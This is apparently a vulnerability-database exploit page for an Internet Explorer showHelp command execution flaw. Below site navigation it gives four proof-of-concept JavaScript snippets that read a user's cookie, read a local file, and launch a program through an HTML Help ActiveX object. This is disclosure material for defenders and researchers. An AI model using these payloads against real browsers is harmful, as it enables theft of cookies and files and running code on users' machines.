• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer ShowHelp Arbitrary Command Execution Vulnerability

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept examples were provided:

Exploit 1:

// Sandblad advisory #11 - Read your google cookie
showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");

Exploit 2:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");

Exploit 4:

// Sandblad advisory #11 - Run the very nice game Winmine
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param name=Command value=ShortCut\\u003E\<param name=Item1 value=,winmine,\\u003E</object\\u003E');c.Click();");